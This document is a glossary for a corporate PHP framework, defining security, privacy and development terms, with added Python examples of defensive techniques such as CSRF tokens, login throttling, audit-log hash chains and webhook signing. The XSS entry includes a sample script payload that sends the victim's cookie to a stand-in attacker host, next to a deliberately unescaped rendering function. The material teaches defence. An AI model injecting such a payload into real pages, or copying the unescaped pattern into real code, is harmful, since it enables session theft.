Glossary

This page is a living reference, designed to define and explain the key concepts, technologies, and principles that constitute the Corporate Framework and our ecosystem. Use it to gain a deeper understanding of the terms we use across our platform and documentation.

A

Access Control

The selective restriction of access to a resource. It is the core security discipline that controls who can do what. Our Access Management feature is a powerful tool for implementing robust access control policies.

Access Management

The process of controlling which users have access to which data and features within an application. Our system is built on Roles and Permissions to provide granular control.
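
Added example, not code from the Corporate Framework: a minimal role-based access check of the kind this entry describes, with the two properties a reviewer looks for, deny by default and fail closed on unknown roles. The role names, permission strings and the User type are assumed for illustration.

```python
from dataclasses import dataclass, field

# Assumed catalogue for the example; the framework's real roles will differ.
# A permission is an "action:resource" string; a role is a named set of them.
ROLE_PERMISSIONS = {
    "viewer": {"read:document"},
    "editor": {"read:document", "write:document"},
    "admin":  {"read:document", "write:document", "delete:document", "manage:users"},
}


@dataclass
class User:
    name: str
    roles: set = field(default_factory=set)


def effective_permissions(user: User) -> set:
    """Union of the permissions granted by every role the user holds.
    A role missing from the catalogue grants nothing: a typo in a role
    assignment fails closed instead of raising or granting everything."""
    perms = set()
    for role in user.roles:
        perms |= ROLE_PERMISSIONS.get(role, set())
    return perms


def is_allowed(user: User, action: str, resource: str) -> bool:
    """Deny by default: the only way to obtain True is an explicit grant."""
    return f"{action}:{resource}" in effective_permissions(user)


def authorize(user: User, action: str, resource: str) -> None:
    """Gate for a request handler: raises unless the action is permitted.
    Run this on the server for every request; hiding a button in the UI
    is not an access control."""
    if not is_allowed(user, action, resource):
        raise PermissionError(f"{user.name} may not {action} {resource}")


if __name__ == "__main__":
    alice = User("alice", {"viewer"})
    bob = User("bob", {"editor", "viewer"})
    print(is_allowed(alice, "write", "document"))   # False
    print(sorted(effective_permissions(bob)))
    authorize(bob, "write", "document")             # passes silently
    authorize(alice, "write", "document")           # raises PermissionError
```

The check is intentionally a pure function of the user's roles and the requested action, so it can be unit-tested without a database and called from every handler that mutates state.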

Agile Development

An iterative approach to project management and software development that helps teams deliver value to their customers faster. It emphasizes adaptive planning, evolutionary development, and continuous improvement.

Anonymization

The process of removing or altering personally identifiable information (PII) in a data set so that the individuals it describes can no longer be identified, directly or indirectly. Properly anonymized data is irreversible and falls outside data protection law; compare Pseudonymization, which remains reversible for whoever holds the key or mapping.

API (Application Programming Interface)

A set of rules and tools that allows different software programs to communicate with each other. Our "API-first" architecture means all Framework functions are accessible to other systems, enabling deep integration and automation.

Attack Surface

The sum of the different points ("attack vectors") where an unauthorized user can try to enter or extract data from an environment. Our goal is to minimize the attack surface of the Framework.

Authentication

The process of verifying that a user (or a service) is who they claim to be, by checking one or more factors: something they know (a password), something they have (a hardware key or authenticator app), or something they are (a biometric). Authentication establishes identity; Authorization then decides what that identity may do.

Authorization

The process of determining whether an authenticated user has permission to perform a specific action or access specific data.

Audit Trail

A chronological, append-only record of security-relevant actions and events in a system: who did what, to which object, and when. To be trustworthy it must be tamper-evident and written to storage that the users it records cannot modify. An audit trail is essential for security investigations, compliance, and debugging.
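
Added example, not part of the Corporate Framework: one way to make an audit trail tamper-evident is to chain the entries with hashes, so that editing, deleting or reordering any entry breaks every hash after it. The entry fields and the AuditTrail class are assumptions made for this example.

```python
import hashlib
import json
import time

GENESIS_HASH = "0" * 64  # stands in for the hash of the entry before the first


def canonical_hash(entry: dict) -> str:
    """SHA-256 over a canonical JSON encoding of every field except 'hash'.
    Sorted keys and fixed separators make the encoding reproducible."""
    body = {k: v for k, v in entry.items() if k != "hash"}
    data = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(data).hexdigest()


class AuditTrail:
    """Append-only log in which each entry commits to the previous one."""

    def __init__(self):
        self.entries = []

    def append(self, actor: str, action: str, target: str, ts=None) -> dict:
        prev = self.entries[-1]["hash"] if self.entries else GENESIS_HASH
        entry = {
            "seq": len(self.entries),
            "ts": time.time() if ts is None else ts,
            "actor": actor,
            "action": action,
            "target": target,
            "prev": prev,
        }
        entry["hash"] = canonical_hash(entry)
        self.entries.append(entry)
        return entry

    def verify(self):
        """Return the index of the first entry that breaks the chain, or None
        if the chain is intact. Catches edited fields, deleted entries and
        reordering. A chain rewritten from scratch is only caught if the
        latest hash was also stored somewhere the attacker cannot reach,
        e.g. shipped to a SIEM or signed by a separate service."""
        prev = GENESIS_HASH
        for i, entry in enumerate(self.entries):
            if entry["seq"] != i or entry["prev"] != prev or entry["hash"] != canonical_hash(entry):
                return i
            prev = entry["hash"]
        return None


if __name__ == "__main__":
    trail = AuditTrail()
    trail.append("alice", "login", "portal")
    trail.append("alice", "export", "customer-list")
    print(trail.verify())              # None: intact
    trail.entries[0]["actor"] = "bob"  # tamper with the first entry
    print(trail.verify())              # 0: first broken entry
```

The chain makes tampering detectable, not impossible: whoever can rewrite the whole log can recompute every hash, which is why the head hash (or the log itself) should be forwarded to a system that the recorded users cannot write to.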


B

Backend

The part of a software application that runs on the server and is invisible to the end-user. The backend handles database logic, business processes, and communication with other systems.

Beta Version

An early, nearly complete version of software released to a limited group (e.g., Certified Developers) to test new features and find bugs before the final release.

Breach (Data Breach)

A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.

Brute-Force Attack

A trial-and-error method for discovering a secret such as a password or a session token by systematically trying candidates, either exhaustively or from a list of likely values (a dictionary attack). Defenses include rate limiting and temporary lockout, slow password hashing, MFA, and tokens long enough that guessing is infeasible.
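
Added example, not framework code: a login path that combines the two server-side defenses named above, a deliberately slow password hash (PBKDF2) and a sliding-window failure counter with lockout. The user store layout, thresholds and the constant-time comparison of hashes are choices made for this example.

```python
import hashlib
import hmac
import secrets
from collections import defaultdict, deque

# Dummy values so unknown users go through the same hashing work as known ones.
DUMMY_SALT = b"\x00" * 16
DUMMY_HASH = b"\x00" * 32


def hash_password(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """A deliberately slow hash: every guess costs the attacker the same work."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


class LoginThrottle:
    """Sliding-window failure counter per key (here: the account name).
    After max_failures failures within window seconds, the key is locked for
    lockout seconds no matter what password is submitted."""

    def __init__(self, max_failures=5, window=300, lockout=900):
        self.max_failures, self.window, self.lockout = max_failures, window, lockout
        self.failures = defaultdict(deque)
        self.locked_until = {}

    def is_locked(self, key: str, now: float) -> bool:
        return self.locked_until.get(key, 0) > now

    def record_failure(self, key: str, now: float) -> None:
        recent = self.failures[key]
        recent.append(now)
        while recent and recent[0] <= now - self.window:
            recent.popleft()
        if len(recent) >= self.max_failures:
            self.locked_until[key] = now + self.lockout
            recent.clear()

    def record_success(self, key: str) -> None:
        self.failures.pop(key, None)


def attempt_login(users: dict, throttle: LoginThrottle, username: str, password: str, now: float) -> str:
    """Returns 'locked', 'denied' or 'ok'. Unknown users take the same code
    path and the same hashing cost as wrong passwords, so neither the reply
    nor the timing reveals which accounts exist."""
    if throttle.is_locked(username, now):
        return "locked"
    record = users.get(username)
    salt, expected = record if record else (DUMMY_SALT, DUMMY_HASH)
    matches = hmac.compare_digest(hash_password(password, salt), expected)
    if record is not None and matches:
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username, now)
    return "denied"


def make_user_store(**passwords) -> dict:
    """Constructed sample store: username -> (salt, PBKDF2 hash)."""
    store = {}
    for name, pw in passwords.items():
        salt = secrets.token_bytes(16)
        store[name] = (salt, hash_password(pw, salt))
    return store
```

Keying the counter on the account alone stops online guessing against one user; a second counter keyed on the source address is needed against password spraying, where the attacker tries one common password across many accounts.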

Bug

An error, flaw, or fault in a computer program that causes it to produce an incorrect or unexpected result.


C

Cache

A temporary data store used to speed up data retrieval and improve application performance. Our framework uses Redis for efficient caching.

CCPA/CPRA (California Consumer Privacy Act / California Privacy Rights Act)

A state-wide data privacy law in California that grants consumers more control over the personal information that businesses collect about them.

CDN (Content Delivery Network)

A network of servers located around the world used to quickly deliver static content like images, videos, and documents to users, regardless of their geographical location.

Certified Developer

A professional developer who has completed and passed Corporate's official certification program, which is a requirement for obtaining a Developer License.

CIA Triad (Confidentiality, Integrity, Availability)

A foundational model for guiding information security policies. Confidentiality ensures data is accessible only to authorized users. Integrity ensures data is accurate and trustworthy. Availability ensures data is accessible when needed.

Cloud-Native

An approach to building and running applications that fully leverages the advantages of cloud computing. Our framework is designed to be cloud-native and easily deployed in containers.

Compliance

The process of ensuring that a company or system adheres to applicable laws, regulations, and standards (e.g., data protection regulation, ISO 27001).

Consent (data protection regulation)

A freely given, specific, informed, and unambiguous indication of a data subject's wishes by which they signify agreement to the processing of personal data relating to them. One of the lawful bases for processing data.

Containerization

A method of packaging an application's code and all its dependencies into a single, isolated unit called a 'container' (typically with Docker). This ensures the application runs uniformly across all environments.

Cron Job

A time-based task scheduled to run automatically at a specific time or interval. Used in our Operations module to automate processes like nightly reports.

Cryptography

The practice and study of techniques for secure communication and storage in the presence of adversaries. It is the basis for Encryption, Digital Signatures, and integrity checks.

CSRF (Cross-Site Request Forgery)

An attack in which a malicious site causes a logged-in user's browser to send a request the user did not intend, for example a form POST that changes an e-mail address or transfers money, riding on the session cookie the browser attaches automatically. Our framework has built-in protection against CSRF.
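
Added example, not the framework's own CSRF implementation: the synchronizer-token pattern that most frameworks' CSRF protection is built on, shown as a tiny server-side handler. The route, field names and request representation are assumptions for the example.

```python
import hmac
import secrets

# Synchronizer-token pattern. Route, field and session layout are assumed.


def new_session(user: str) -> dict:
    """Server-side session, referenced by a cookie. The CSRF token is random
    per session and only ever appears inside pages served to this user."""
    return {"id": secrets.token_urlsafe(16), "user": user,
            "csrf_token": secrets.token_urlsafe(32)}


def render_transfer_form(session: dict) -> str:
    """The legitimate page embeds the token as a hidden field."""
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(session: dict, request: dict):
    """request = {"method": ..., "form": {...}} as the server sees it.
    The browser attaches the session cookie to every request to this origin,
    so the cookie alone says nothing about who composed the request."""
    if request["method"] != "POST":
        return 405, "state-changing actions must not be reachable via GET"
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {request['form']['amount']} to {request['form']['to']}"


def forged_request(to: str, amount: str) -> dict:
    """What an attacker's page can make the victim's browser send: a POST with
    attacker-chosen fields but no token, because the same-origin policy stops
    the attacker from reading the victim's pages or session."""
    return {"method": "POST", "form": {"to": to, "amount": amount}}


def legitimate_request(session: dict, to: str, amount: str) -> dict:
    return {"method": "POST", "form": {"to": to, "amount": amount,
                                       "csrf_token": session["csrf_token"]}}


if __name__ == "__main__":
    s = new_session("alice")
    print(handle_transfer(s, forged_request("mallory", "1000")))   # (403, ...)
    print(handle_transfer(s, legitimate_request(s, "bob", "10")))  # (200, ...)
```

Setting the session cookie with SameSite=Lax or Strict is a useful second layer, but the token check is what protects older browsers and cross-site POSTs that SameSite=Lax still allows through.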

Cybersecurity

The practice of protecting systems, networks, and programs from digital attacks.


D

Dashboard

A visual user interface that provides a central overview of key performance indicators (KPIs) and data in an application.

Database

An organized collection of data that an application can access and manage.

Data Controller

Under the data protection regulation, the entity that determines the purposes and means of processing personal data. When a business uses a Solution built on our framework to manage their customer information, the business is the Data Controller.

Data Minimization

A principle of the data protection regulation stating that personal data collected should be adequate, relevant, and limited to what is necessary in relation to the purposes for which they are processed.

Data Portability

A right under the data protection regulation that allows individuals to obtain and reuse their personal data for their own purposes across different services.

Data Processor

Under the data protection regulation, the entity that processes personal data on behalf of the data controller. In the context of our platform, Corporate acts as the Data Processor.

Data Processing Agreement (DPA)

A legally binding agreement between a data controller and a data processor, required by the data protection regulation.

Developer Hub

Our private online portal exclusively for Certified Developers.

Digital Signature

A public-key cryptographic method for verifying the authenticity and integrity of a message or document: the signer computes the signature with a private key, and anyone holding the matching public key can verify it. Because only the private key holder could have produced it, a valid signature also supports non-repudiation. Not to be confused with a scanned handwritten signature.

Disaster Recovery

A set of policies and procedures to enable the recovery of technology infrastructure and systems following a natural or human-induced disaster. Our Backup feature is a key component of this.

DDoS (Distributed Denial-of-Service)

A malicious attempt to disrupt the normal traffic of a server or network by overwhelming the target with a flood of internet traffic.

Docker

The leading platform for Containerization.

DPIA (Data Protection Impact Assessment)

A process required by the data protection regulation to help identify and minimize the data protection risks of a new project or system.

Runtime License

The legal agreement that grants a company the right to use and operate a specific application built on the Corporate Framework.


E

Elasticsearch

A powerful, open-source search and analytics engine that drives the advanced Search functionality in our framework.

Encryption

The process of transforming data with a key so that it is unreadable to anyone who does not hold the matching key; decryption reverses it. We use encryption both "in transit" (TLS across networks) and "at rest" (when stored on disk or in backups). Encryption protects confidentiality; protecting integrity as well requires an authenticated mode, which is what modern libraries default to.

End-to-End Encryption (E2EE)

A design in which data is encrypted on the sending device and decrypted only on the receiving device, so that no intermediary, including the service operator, can read it. Transport encryption (SSL/TLS) alone is not end-to-end: the server terminating the TLS connection sees the plaintext.

Endpoint

A specific URL in an API where a particular function or resource can be accessed.

Enterprise Grade

A term used to describe software that is robust, scalable, and secure enough for use in large, business-critical organizations.


F

Firewall

A network security system that monitors and controls incoming and outgoing network traffic based on predefined security rules.

Framework

A reusable software platform that provides a basic foundation upon which developers can build applications.

Frontend

The part of an application that the user interacts with directly in the browser (design, layout, buttons).


G

GDPR (General Data Protection Regulation)

The EU's data protection and privacy law, which sets strict rules for the collection and processing of personal data.

Git

The most widely used modern Version Control system for tracking changes in source code during software development.


H

High Availability

A system's ability to keep operating with minimal downtime despite component failures. It is achieved through redundancy, automatic failover and Load Balancing, not by assuming that nothing fails.

Hosting

The service of making an application available on the internet by storing its files on a server.


I

i18n (Internationalization)

The technical process of designing software so that it can support different languages and regions.

IAM (Identity and Access Management)

A broad framework of policies and technologies for ensuring that the proper people have the appropriate access to technology resources.

IdP (Identity Provider)

A system that manages digital identities and user authentication. Our IdP is the central login service for all our portals.

Incident Response

An organized approach to addressing and managing the aftermath of a security breach or cyberattack.

Information Security

The practice of protecting information from unauthorized access, use, disclosure, disruption, modification, or destruction.

Integration

The process of connecting different software systems so they can exchange data and work together.


J

JSON (JavaScript Object Notation)

A lightweight, text-based format for data interchange that is easy for humans to read and for machines to parse. It is the standard format for most modern RESTful APIs.


K

Kubernetes (K8s)

An open-source platform for automating the deployment, scaling, and management of container-based applications.


L

l10n (Localization)

The actual process of adapting an internationalized software for a specific language and culture.

Lawful Basis for Processing

A requirement under the data protection regulation that all processing of personal data must be justified by one of six specific legal grounds (e.g., Consent, contract, legal obligation).

Load Balancing

The process of distributing network traffic across multiple servers to ensure that no single server becomes overwhelmed, thereby improving performance and reliability.


M

Malware

Malicious software designed to disrupt, damage, or gain unauthorized access to a computer system.

Man-in-the-Middle (MitM) Attack

An attack in which the attacker secretly relays, and possibly alters, the communication between two parties who believe they are talking to each other directly (for example on an untrusted Wi-Fi network or through a spoofed DNS answer). HTTPS, meaning TLS with correct certificate validation, is the primary defense on the web: it both encrypts the traffic and authenticates the server, so the relay can neither read nor modify the data.

MFA (Multi-Factor Authentication)

A security method requiring a user to present two or more verification factors from different categories: something they know (a password), something they have (an authenticator app or hardware security key), or something they are (a biometric). Two factors of the same kind, such as a password plus a security question, do not count. MFA is one of the most effective defenses against stolen or guessed passwords; factors such as FIDO2 keys also resist Phishing.

Microservices

An architectural style that structures an application as a collection of small, independent services that communicate over APIs.


O

OWASP (Open Worldwide Application Security Project)

A global non-profit organization focused on improving software security; until 2023 the name expanded to Open Web Application Security Project. Its "OWASP Top 10" is the most widely cited list of critical web application security risks, and its Application Security Verification Standard (ASVS) and Cheat Sheet Series are practical references for developers.


P

Patch Management

The process of managing and applying updates (patches) to software to fix bugs or address security vulnerabilities.

Penetration Test (Pentest)

An authorized, simulated cyberattack on a computer system, performed to evaluate its security.

Personally Identifiable Information (PII)

Any data that can be used to identify a specific individual. The data protection regulation has a broad definition of what constitutes personal data.

Phishing

A type of social engineering attack often used to steal user data, including login credentials and credit card numbers.

PHP

The server-side scripting language that the Corporate Framework is built in.

PIPEDA (Personal Information Protection and Electronic Documents Act)

Canada's main federal privacy law for the private sector.

Principle of Least Privilege (PoLP)

A security concept requiring that a user be given only the minimum levels of access – or permissions – needed to perform their job functions.

Privacy by Design

An approach to systems engineering which states that privacy and data protection should be embedded throughout the entire lifecycle of a project. This is a core principle of our Framework.

Pseudonymization

A de-identification procedure in which directly identifying fields are replaced by artificial identifiers (pseudonyms) such that the data can no longer be attributed to a specific individual without additional information that is kept separately. Pseudonymized data is still personal data under the GDPR, because re-identification remains possible for whoever holds the mapping or key; only Anonymization takes data out of scope.
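
Added example, not from the framework: the difference between a real pseudonym and a thin disguise, for this entry and the Anonymization entry above. An unkeyed hash of an e-mail address looks anonymous but can be reversed with a candidate list; an HMAC under a secret key kept apart from the data cannot, and only the key holder can link records back. The sample records and the key handling are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed sample data: three customer records to be exported for analytics.
CUSTOMERS = [
    {"email": "alice@example.com", "plan": "pro"},
    {"email": "bob@example.com", "plan": "free"},
    {"email": "carol@example.com", "plan": "pro"},
]


def naive_pseudonym(email: str) -> str:
    """Unkeyed hash: deterministic and public, so it only looks anonymous."""
    return hashlib.sha256(email.lower().encode()).hexdigest()


def keyed_pseudonym(email: str, key: bytes) -> str:
    """HMAC under a secret key stored apart from the data (e.g. in a KMS).
    Without the key, matching a guess to a pseudonym is infeasible; with it,
    the controller can still honour a deletion or access request."""
    return hmac.new(key, email.lower().encode(), hashlib.sha256).hexdigest()


def export(records, pseudonymize) -> list:
    """The data set as handed to a third party: identifiers replaced."""
    return [{"subject": pseudonymize(r["email"]), "plan": r["plan"]} for r in records]


def dictionary_attack(exported, candidates, pseudonymize) -> dict:
    """Re-identification as an attacker attempts it: hash every candidate
    identifier (leaked address book, public staff list, ...) and look for
    matches among the exported pseudonyms. Returns pseudonym -> identifier."""
    table = {pseudonymize(c): c for c in candidates}
    return {row["subject"]: table[row["subject"]] for row in exported if row["subject"] in table}


if __name__ == "__main__":
    guesses = ["alice@example.com", "bob@example.com", "dave@example.com"]
    print(dictionary_attack(export(CUSTOMERS, naive_pseudonym), guesses, naive_pseudonym))
    key = secrets.token_bytes(32)
    print(dictionary_attack(export(CUSTOMERS, lambda e: keyed_pseudonym(e, key)),
                            guesses, naive_pseudonym))   # {}
```

Note that even the keyed version leaves the remaining columns intact: if "plan" were rare enough to single someone out, the record would still be identifiable, which is why pseudonymization is a safeguard and not anonymization.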


Q

Queue

A system used to manage background tasks. Tasks are placed in a queue and processed one by one by a "worker," preventing the user interface from slowing down. Used in our Operations module.


R

Ransomware

A type of Malware that encrypts the victim's data, and increasingly also exfiltrates it and threatens publication, then demands a ransom for the decryption key or for silence. Tested, offline Backups are the primary recovery control.

Redis

An in-memory key-value data store. In our framework it backs Caching and the job Queue.

RESTful API

An architectural style for APIs that uses standard HTTP methods (GET, POST, PUT, DELETE) on resource URLs. The most widespread style for integrations.

Risk Assessment

The process of identifying, analyzing, and evaluating potential security risks.


S

SaaS (Software as a Service)

A software licensing and delivery model in which software is licensed on a subscription basis and is centrally hosted.

Scalability

A system's ability to handle a growing amount of work or users without a loss in performance.

Security Hardening

The process of securing a system by reducing its Attack Surface. This involves removing unnecessary software, accounts, or services.

SIEM (Security Information and Event Management)

A solution that helps organizations detect, analyze, and respond to security threats by collecting and correlating log data from multiple sources.

Social Engineering

A manipulation technique used to trick users into divulging confidential information. Phishing is a common example.

SQL Injection

An attack in which untrusted input is concatenated into a SQL query and becomes part of the query's syntax, letting an attacker read, modify, or delete data they are not authorized to touch. The standard defense is parameterized queries (prepared statements), in which input is sent to the database separately from the query text. Our framework automatically protects against this for queries built through its own data access layer; hand-written SQL that concatenates user input bypasses that protection.

SSL/TLS (Secure Sockets Layer / Transport Layer Security)

The protocols used to establish an encrypted, authenticated connection between a client (such as a browser) and a server; this is what turns HTTP into HTTPS. SSL is the deprecated predecessor and should no longer be enabled; current deployments use TLS 1.2 or 1.3, although the name "SSL" survives in everyday use (e.g. "SSL certificate").

SSO (Single Sign-On)

An authentication method that allows a user to sign in with a single set of credentials to multiple independent software systems.

Subject Access Request (SAR)

A request made by an individual under the data protection regulation for the personal information an organization holds about them.


T

Tags

Flexible, user-defined labels that can be added to data (e.g., documents, customers) to organize and find them across different categories.

Terms of Service

The legal agreement that defines the rules and conditions for using a service.

Threat Actor

An entity that is partially or wholly responsible for an incident that impacts an organization's security.

Threat Modeling

A process by which potential threats can be identified, enumerated, and prioritized – all from a hypothetical attacker’s point of view.

Token

In authentication and API communication, a piece of data issued to a client after it has authenticated (a session identifier, an API key, or a signed token such as a JWT) that the client presents on later requests instead of its credentials. Tokens should be generated unpredictably, expire, and be revocable, and should be treated as secrets in logs and URLs. The related term tokenization refers to replacing a sensitive value (such as a card number) with a surrogate that is meaningless outside the system that issued it.

Two-Factor Authentication (2FA)

A specific type of MFA that requires exactly two verification factors.


U

UI (User Interface)

The visual part of an application that a user interacts with.

Uptime

The measure of time a system has been operational and available. Often expressed as a percentage, e.g., "99.9% uptime."

UX (User Experience)

The overall experience a user has when interacting with an application, including how easy and pleasant it is to use.


V

Version Control

A system that tracks and manages changes to files over time (especially source code), allowing you to recall specific versions later. Git is the most common system.

Vulnerability

A weakness in a system that can be exploited by a Threat Actor to perform unauthorized actions.

Vulnerability Disclosure Program (VDP)

A formal program that provides a safe channel for external security researchers to report vulnerabilities to an organization.


W

Webhook

An automated way for applications to send notifications to each other in real-time. When a specific event occurs, the source application sends an HTTP message to a configured URL in the receiving application.
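
Added example, not the framework's webhook implementation: since a webhook endpoint is a public URL that anyone can POST to, the receiver has to verify that each delivery really came from the sender. The usual scheme is an HMAC over the raw body and a timestamp with a shared secret; this block shows both the sending and the receiving side, including the replay check. Header names, the secret and the sample event are assumptions made for the example.

```python
import hashlib
import hmac
import json

# Assumed header names; real providers use their own.
SIGNATURE_HEADER = "X-Webhook-Signature"
TIMESTAMP_HEADER = "X-Webhook-Timestamp"


def sign_webhook(secret: bytes, body: bytes, ts: int) -> dict:
    """Sender side: MAC over timestamp and raw body under the shared secret.
    Binding the timestamp into the MAC stops an attacker from replaying a
    captured delivery later with a fresh timestamp."""
    mac = hmac.new(secret, f"{ts}.".encode() + body, hashlib.sha256).hexdigest()
    return {TIMESTAMP_HEADER: str(ts), SIGNATURE_HEADER: "sha256=" + mac}


def verify_webhook(secret: bytes, body: bytes, headers: dict, now: int, max_age: int = 300) -> bool:
    """Receiver side. Verify over the raw bytes *before* parsing JSON: parsing
    and re-serialising changes whitespace and key order, and the MAC would
    no longer match."""
    try:
        ts = int(headers.get(TIMESTAMP_HEADER, ""))
    except ValueError:
        return False
    if abs(now - ts) > max_age:
        return False  # stale or replayed delivery
    expected = sign_webhook(secret, body, ts)[SIGNATURE_HEADER]
    received = headers.get(SIGNATURE_HEADER, "")
    return hmac.compare_digest(expected.encode(), received.encode())


def handle_delivery(secret: bytes, body: bytes, headers: dict, now: int):
    """Returns the parsed event, or None if the delivery is not trusted."""
    if not verify_webhook(secret, body, headers, now):
        return None
    return json.loads(body)


if __name__ == "__main__":
    secret = b"shared-secret-from-the-provider-settings"   # assumed value
    body = b'{"event":"invoice.paid","id":"inv_123"}'       # constructed sample event
    headers = sign_webhook(secret, body, ts=1_700_000_000)
    print(handle_delivery(secret, body, headers, now=1_700_000_010))   # parsed event
    print(handle_delivery(secret, body, headers, now=1_700_000_000 + 3600))  # None: too old
```

Within the freshness window a delivery can still be replayed once, so idempotent handlers (or a short-lived cache of seen event ids) complete the picture.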

White Paper

An in-depth, authoritative document that illuminates a complex topic and presents a solution. Found in our Resource Library.

Whitelisting

The practice of explicitly allowing only identified entities (e.g., an email sender, an IP address, or a file type) to access a service or be processed, while denying everything else. Now more often called allowlisting. It is the stronger counterpart of blocklisting (denylisting), which tries to enumerate what is bad and misses anything it has not seen before.


X

XSS (Cross-Site Scripting)

A vulnerability in which attacker-controlled input is placed into a web page without proper output encoding, so that script the attacker injected runs in other users' browsers with their session and privileges (stealing tokens, performing actions as them, or defacing the page). Our framework automatically protects against this by escaping output in its templates; content a developer deliberately renders as raw HTML is not covered and must be sanitized first.
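
Added example, not the framework's template engine: the unescaped rendering beside its escaped form, and the URL-attribute case that escaping alone does not solve. The comment payload and the helper functions are constructed for this example.

```python
import html

# Constructed sample input: a comment that tries to exfiltrate the session cookie.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_comment_vulnerable(author: str, text: str) -> str:
    """Deliberately vulnerable: untrusted text is concatenated into HTML, so
    whatever markup it contains becomes part of the page."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_comment_safe(author: str, text: str) -> str:
    """Output encoding for the HTML text context: &, <, >, " and ' become
    entities, so the browser displays the payload instead of executing it."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def render_profile_link_safe(url: str, label: str) -> str:
    """A URL attribute is a different context. Escaping does not help against
    javascript:... because that string contains nothing to escape; the scheme
    is allowlisted first, then the value is attribute-escaped (quote=True)."""
    if not url.strip().lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))   # <script> lands in the page
    print(render_comment_safe("mallory", PAYLOAD))         # &lt;script&gt; is just text
    print(render_profile_link_safe("javascript:alert(1)", "me"))  # href="#"
```

Encoding must match the context the value lands in (HTML text, attribute, URL, JavaScript string); a Content Security Policy that disallows inline script is the defense-in-depth layer for the cases a template misses.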


Z

Zero-Day Vulnerability

A software vulnerability that is exploited, or publicly known, before the vendor has a patch available; the name refers to the vendor having had zero days to fix it. Because no patch exists, defenses rely on Security Hardening, the Principle of Least Privilege, and detection rather than on Patch Management.

Zero Trust Architecture

A modern security model that operates on the principle of "never trust, always verify." It requires strict identity verification for every person and device trying to access resources on a network, regardless of whether they are sitting inside or outside the network perimeter.
